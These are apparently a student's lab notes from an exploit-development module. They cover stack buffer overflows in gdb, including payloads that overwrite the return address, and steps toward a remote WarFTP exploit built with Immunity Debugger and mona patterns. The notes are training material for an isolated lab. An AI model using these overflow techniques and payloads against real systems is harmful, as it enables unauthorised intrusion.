< All Advanced Penetration Testing Notes

GrapeApe561 | Advanced Penetration Testing | Module 12 - Exploit Development

By: GrapeApe561 | Related Course: Advanced Penetration Testing | Published: March 31, 2018 | Modified: April 5, 2018
Join Cybrary

NotepadPart 4

(Part 4: GNU Compilers)

(On Ubuntu VM): cat overflowtest.c

gcc -g -fno-stack-protector -o overflowtest overflowtest.c

./overflowtest AAAA

./overflowtest AAAAAAAAAAAAAAAAAAA

gdb overflowtest

After (gdb), type list 1,16

(gdb) break 14

(gdb) break 10

(gdb) break 11

(gdb) run AAAA

(gdb) help x

(gdb) x/16xw $esp

(gdb) x/xw $ebp

(gdb) continue

(gdb) x/16xw $esp

(gdb) x/xw $ebp

(gdb) disassemble main

(gdb) set disassembly-flavor intel

(gdb) disassemble main

(gdb) x/16xw $esp

(gdb) continue

(gdb) x/16xw $esp

(gdb) continue

 

 


Notepadpart 5

(Part 5: Python)

(gdb) run $(python -c ’print ”A” * 9 + ”B” * 4’)

(gdb) x/16xw $esp

(gdb) x/xw $ebp

(gdb) continue

(gdb) x/16xw $esp

(gdb) disassemble main

(gdb) x/xw $ebp

(gdb) continue

(gdb) x/16xw $esp

(gdb) info registers

(gdb) continue

 


NotepadPart 6

(Part 6: Unintended Code)

(gdb) list 1,16

(gdb) disassemble overflowed

(gdb) run $(python -c ’print ”A” * 9 + ”\x08\x04\x83\xf4” ’) , choose y

(gdb) x/16xw $esp

(gdb) x/xw $ebp

(gdp) continue

(gdb) x/16xw $esp

(gdb) continue

(gdb) x/16xw $esp

(gdb) disassemble overflowed

(gdb) continue

(gdb) run $(python -c ’print ”A” * 9 + ”\xf4\x83\x04\x08” ’) , choose y

(gdb) continue

(gdb) continue

(gdb) continue

(gdb) x/16xw $esp

(gdb)


NotepadPart 7

(Part 7:  Network based Exploits and Debuggers)

(On Windows XP VM):  On XAMPP Coontrol Panel, Stop FileZilla

Go to the WarFTP folder, click on war-ftp daemon icon, click OK, click on the lightning bolt button

Double click the Immunity Debugger on Desktop, click File –> Attach, click on the line with TCP 21 then click Attach, click the play button

(On Kali Linux VM): Copy warftpskel.py onto Desktop.

cd Desktop

cat warftpskel.py

chmod +x warftpskel.py

nano warftpskel.py, change IP address to your Windows XP IP address, exit

./warftpskel.py

man ascii (after viewing Immunity Debugger)

 

 

 


Notepadpart 8

 

(Part 8: Creating a Cyclic Pattern)

 

(On Windows XP VM):On Immunity Debugger, click Debug –> Restart, click Yes, click play button (delete FTPdaemon.dat from the warftp folder if there is an error, then repeat the steps, plus click Okay, click lighning button)

 

(On Windows XP VM): Open Immunity Debugger type the following: !mona pattern_create 1100

 

(On Windows XP VM): Start –> My Computer –> Local Disk (C:) –> logs folder –>warftpd –> pattern.txt, copy everything under ”Pattern of 1100 bytes:”

 

(On Kali Linux VM):  cd Desktop

 

nano warftpskel.py, put hash sign before ”buffer=”, then on next line type: buffer = ”(then paste and add ”), save

 

./warftpskel.py

 

On Immunity Debugger, type !mona pattern_offset 32714131

 

On Immunity Debugger, type !mona findmsp

 

(On Windows XP VM): Start –> My Computer –> Local Disk (C:) –> logs folder –>warftpd –> findmsp.txt, copy everything from EIP and ESP and save in seperate file for reference

 

 

 

 


< All Advanced Penetration Testing Notes
Join Cybrary

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel